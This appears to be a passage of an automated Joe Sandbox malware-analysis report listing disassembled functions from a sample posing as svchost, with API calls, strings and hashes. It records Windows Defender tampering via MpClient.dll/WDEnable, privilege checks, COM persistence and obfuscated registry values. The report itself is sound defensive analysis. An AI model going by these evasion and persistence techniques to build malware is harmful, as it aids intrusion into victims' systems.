                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: 5DD2BAAFa$software\microsoft
                                                                                                                                                                                                              • API String ID: 217510255-2040404611
                                                                                                                                                                                                              • Opcode ID: 66468a6739b327f882d7d7ade55cb9966f2c2f57501c0bc41e10c69f4a99bec8
                                                                                                                                                                                                              • Instruction ID: 81f1705bd98395ffdb4f97a24b2c6ee10d77a72c6c9a3c66ee346a02e3f99dbd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66468a6739b327f882d7d7ade55cb9966f2c2f57501c0bc41e10c69f4a99bec8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B931E670E452186AEB25DB64CC4DBDE7B7CEF08744F5045A8F649E6180E7B09788CBE0
                                                                                                                                                                                                              Function 02CB4880 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,74DF0F00,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB4895
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48AC
                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48CA
                                                                                                                                                                                                              • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48E2
                                                                                                                                                                                                              • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB4908
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00000000), ref: 02CB493B
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(?), ref: 02CB494C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB495E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB496F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleInformation$CharCloseOpenProcessTokenUpper$ChangeFindNotification
                                                                                                                                                                                                              • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                              • API String ID: 4044281766-3691563785
                                                                                                                                                                                                              • Opcode ID: 5816b24be4d165de533bbe4c763764cba9890f29417885028c7be616f3f4c536
                                                                                                                                                                                                              • Instruction ID: 84b298b07b80629918c95634d484236134a293567097bb3aace268b1622cf80c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5816b24be4d165de533bbe4c763764cba9890f29417885028c7be616f3f4c536
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B31F871D44309AFEB25CBA4C898FEE7BBCBF88315F444598EA05A7042D774DA08CB61
                                                                                                                                                                                                              Function 004020E0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00402157
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402166
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                              • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                              • API String ID: 1010965793-1794910726
                                                                                                                                                                                                              • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                              Function 00402680 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 004028BE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                              • String ID: Windows Explorer
                                                                                                                                                                                                              • API String ID: 1140695583-228612681
                                                                                                                                                                                                              • Opcode ID: 8bb4e062025032df17ae7dd21582db741fec3b94b95eb974e8202e97bb420e09
                                                                                                                                                                                                              • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bb4e062025032df17ae7dd21582db741fec3b94b95eb974e8202e97bb420e09
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                              Function 02CB4FF0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB5023
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02CB5032
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,00000000), ref: 02CB5039
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB5051
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02CB5068
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02CB506E
                                                                                                                                                                                                                • Part of subcall function 02CA41E0: GetProcessHeap.KERNEL32(00000008,02CB5097,00000000,75A934D0,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA41FE
                                                                                                                                                                                                                • Part of subcall function 02CA41E0: HeapAlloc.KERNEL32(00000000,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA4205
                                                                                                                                                                                                                • Part of subcall function 02CA41E0: memset.MSVCRT ref: 02CA4215
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02CB508F
                                                                                                                                                                                                              • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB50B6
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB50CA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02CB5000
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$memset$NameProcessUser$AllocAllocateErrorLastlstrcpyn
                                                                                                                                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                              • API String ID: 2345603349-374730529
                                                                                                                                                                                                              • Opcode ID: f209c446325afc861f6a67be7a87297d97be79f0b7a6d1151610daa95663e1e0
                                                                                                                                                                                                              • Instruction ID: 4c26f76f3d998e08cce2d63ff0606f16ab34097713ca3c5420a7cb86b4d98540
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f209c446325afc861f6a67be7a87297d97be79f0b7a6d1151610daa95663e1e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D212772D00216ABD72296649C44FFBB7BDAFC4781F600519FA4597180EB70AB059BE0
                                                                                                                                                                                                              Function 02CA2570 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA2587
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,74DEF550,00000000), ref: 02CA259E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,?,74DEF550,00000000), ref: 02CA25AB
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?,?,74DEF550,00000000), ref: 02CA25E7
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(02CE9F08,00000000,00000104,00000000,00000001,?,74DEF550,00000000), ref: 02CA2611
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02CA2620
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,74DEF550,00000000), ref: 02CA2623
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02CA2630
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,74DEF550,00000000), ref: 02CA2633
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                              • String ID: 5dd2bfbfa
                                                                                                                                                                                                              • API String ID: 780088666-1606156145
                                                                                                                                                                                                              • Opcode ID: b14b6990d02c375d6c6bbe6ac1fbcbc3e452e8228e2fc05537d24f2015e383f5
                                                                                                                                                                                                              • Instruction ID: 60094a307c6325eb8c34fa39e25c3cd77b9ab4506eda3a44da84726e2ba20442
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b14b6990d02c375d6c6bbe6ac1fbcbc3e452e8228e2fc05537d24f2015e383f5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E112971B8231567DB2056385C29FDB7B5CAB91B51F400650F98AEB1C0DFF19980CAE1
                                                                                                                                                                                                              Function 02CA4EA7 Relevance: 16.6, APIs: 11, Instructions: 77memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000), ref: 02CA4EFF
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02CA4F02
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02CA4F0F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 02CA4F12
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02CA4F2A
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02CA4F2D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02CA4F3A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 02CA4F3D
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02CA4F53
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02CA4F5D
                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02CA4F67
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$CloseHandleInternet$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 278890334-0
                                                                                                                                                                                                              • Opcode ID: aa878b2dcbd17afb5e1e0ae6f857dd7a2fd116a45e22b08c9e3c9b451d86d99d
                                                                                                                                                                                                              • Instruction ID: e956d4fb7bc3abdf94b5338bcdc05b73248bb892563fbf0c07e60305fd756b21
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa878b2dcbd17afb5e1e0ae6f857dd7a2fd116a45e22b08c9e3c9b451d86d99d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C21D231A062556BDB28ABB59C5CFDF7BACEF88759F000469F609E3140DAB1D910CBA0
                                                                                                                                                                                                              Function 02CA4780 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 125registrymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA478A
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA47C0
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02CA47E7
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02CA480A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02CA487D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02CA4884
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4894
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02CA48C2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 1484339481-3673152959
                                                                                                                                                                                                              • Opcode ID: a0e1b737ecad05c29ad7b07bebbff276a2548421223424be814d2def5af7eb3d
                                                                                                                                                                                                              • Instruction ID: 06395caa23cd51dd3ddafb7d43bb002611d1b775c999fa85a2c96f98ab72df1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0e1b737ecad05c29ad7b07bebbff276a2548421223424be814d2def5af7eb3d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E941F9329011DA9BDB39CF65A825FDEBBB9AF81B48F144294ED44E7100D7B09705CBE0
                                                                                                                                                                                                              Function 02CAA060 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAA068
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02CAA227), ref: 02CAA09F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(02CAA227,5dd2beaba,00000000,?,00000000,?), ref: 02CAA0BC
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(02CAA227), ref: 02CAA0C6
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02CAA0F9
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,5dd2beaba,00000000,?,00000000,?), ref: 02CAA116
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CAA120
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 5dd2beaba$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-3143834697
                                                                                                                                                                                                              • Opcode ID: 397e5fae1bd2be3fbc695d6d31c84ef7cd7f5fdec393e196ea087ec9ea803043
                                                                                                                                                                                                              • Instruction ID: d547e1b9ff2c681df750c955d19d7f06485663d273b217e1dcec33d9f1c1cc0a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 397e5fae1bd2be3fbc695d6d31c84ef7cd7f5fdec393e196ea087ec9ea803043
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7213375E51209FBEB10DBA4CC95FEEBBB8EF44744F904559E601E6140E7B4A704CB90
                                                                                                                                                                                                              Function 02CA36B0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA36B8
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02CA36EF
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,5DD2BEE3a,00000000,?,00000000,?), ref: 02CA370C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CA3716
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02CA3749
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,5DD2BEE3a,00000000,?,00000000,?), ref: 02CA3766
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02CA3770
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 5DD2BEE3a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-2156778992
                                                                                                                                                                                                              • Opcode ID: bb2f6417133eaa5284f1d51139061700f9059a6b568445040d9d68163a3b7c06
                                                                                                                                                                                                              • Instruction ID: 54ae6539ab5709fa08543c701d2eec663e088b69fdbff6ea61f8a3ae30840bcc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb2f6417133eaa5284f1d51139061700f9059a6b568445040d9d68163a3b7c06
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9214FB5E5020AFBEB10CFA4CD95FEEB7B8AB44744F904699E501E7140E7B4A6048B94
                                                                                                                                                                                                              Function 02C93420 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 76registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C93428
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02CA5B76), ref: 02C9345F
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(02CA5B76,5dd2bf39a,00000000,?,00000000,?), ref: 02C9347C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(02CA5B76), ref: 02C93486
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C934B9
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,5dd2bf39a,00000000,?,00000000,?), ref: 02C934D6
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02C934E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 5dd2bf39a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-1636192762
                                                                                                                                                                                                              • Opcode ID: ebe68d21e884c4691b3eb2940b6fc41b847eef10bca0540beeb3a27b749235cf
                                                                                                                                                                                                              • Instruction ID: dba55b4fb70a5a400228a3b7bf03fbfe7ad63de05adeffa5908a7da7c13769ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebe68d21e884c4691b3eb2940b6fc41b847eef10bca0540beeb3a27b749235cf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5212175E51209FBEF10CBA4CC99FEEBBB8EB44744F904599E501E7180E7B4A7448B90
                                                                                                                                                                                                              Function 02CA4630 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114registrymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4664
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,00000000,00000000), ref: 02CA4687
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,00000000,00000000), ref: 02CA46AA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015,?,00000000,00000000), ref: 02CA471D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02CA4724
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4734
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(80000002,?,00000000,00000000), ref: 02CA4762
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 4043890984-3673152959
                                                                                                                                                                                                              • Opcode ID: c3e47be48cc4f586f0ddc9112b71e428c5b18efc2b13a790934d325aaff4efba
                                                                                                                                                                                                              • Instruction ID: 3e84c2931f18eddb7d55180c0332165c71a27b62514ee4d9cda26da6f219142e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3e47be48cc4f586f0ddc9112b71e428c5b18efc2b13a790934d325aaff4efba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19312B32D0125A9BDB36CB648C58FDB7BB9AFC6748F1542A4E954D7100D7B0AB48CBE0
                                                                                                                                                                                                              Function 02CAA140 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CAA147
